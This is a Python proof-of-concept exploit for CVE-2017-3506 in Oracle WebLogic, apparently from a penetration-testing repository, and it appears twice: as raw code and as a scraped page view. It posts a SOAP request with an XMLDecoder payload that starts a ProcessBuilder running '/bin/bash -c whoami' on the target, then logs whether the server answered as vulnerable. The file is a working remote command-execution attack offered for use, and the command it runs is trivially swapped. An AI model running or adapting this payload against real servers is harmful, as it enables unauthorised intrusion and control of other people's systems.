Penetration_Testing_POC/WeblogicScanLot/poc/CVE_2017_3506.py

#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _    
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\

'''
import sys
import requests
import re
import logging

logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

VUL=['CVE-2017-3506']
headers = {'user-agent': 'ceshi/0.0.1'}

def poc(url,index):
    rurl=url
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
				<void index="2">
                  <string>whoami</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
        response = response.text
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception:
        response = ""

    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))
    else:
        logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))


def run(rip,rport,index):
    url=rip+':'+str(rport)
    poc(url=url,index=index)

if __name__ == '__main__':
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip,dport,0)
upload about Weblogic 2019-08-31 10:33:26 +08:00			`#!/usr/bin/env python3`
			`# __ coding:utf-8 __`
			`'''`
			`____ _ _ _ _ __ __ _`
			`\| _ \ __ _\| \|__ \| \|__ (_) \|_\| \/ \| __ _ ___\| \| __`
			\| \|_) / _` \| '_ \\| '_ \\| \| __\| \|\/\| \|/ _` / __\| \|/ /
			`\| _ < (_\| \| \|_) \| \|_) \| \| \|_\| \| \| \| (_\| \__ \ <`
			`\|_\| \_\__,_\|_.__/\|_.__/\|_\|\__\|_\| \|_\|\__,_\|___/_\|\_\`

			`'''`
			`import sys`
			`import requests`
			`import re`
			`import logging`

			`logging.basicConfig(filename='Weblogic.log',`
			`format='%(asctime)s %(message)s',`
			`filemode="w", level=logging.INFO)`

			`VUL=['CVE-2017-3506']`
			`headers = {'user-agent': 'ceshi/0.0.1'}`

			`def poc(url,index):`
			`rurl=url`
			`if not url.startswith("http"):`
			`url = "http://" + url`
			`if "/" in url:`
			`url += '/wls-wsat/CoordinatorPortType'`
			`post_str = '''`
			`<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">`
			`<soapenv:Header>`
			`<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">`
			`<java>`
			`<object class="java.lang.ProcessBuilder">`
			`<array class="java.lang.String" length="3">`
			`<void index="0">`
			`<string>/bin/bash</string>`
			`</void>`
			`<void index="1">`
			`<string>-c</string>`
			`</void>`
			`<void index="2">`
			`<string>whoami</string>`
			`</void>`
			`</array>`
			`<void method="start"/>`
			`</object>`
			`</java>`
			`</work:WorkContext>`
			`</soapenv:Header>`
			`<soapenv:Body/>`
			`</soapenv:Envelope>`
			`'''`

			`try:`
			`response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)`
			`response = response.text`
			`response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)`
			`except Exception:`
			`response = ""`

			`if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:`
			`logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))`
			`else:`
			`logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))`


			`def run(rip,rport,index):`
			`url=rip+':'+str(rport)`
			`poc(url=url,index=index)`

			`if __name__ == '__main__':`
			`dip = sys.argv[1]`
			`dport = int(sys.argv[2])`
			`run(dip,dport,0)`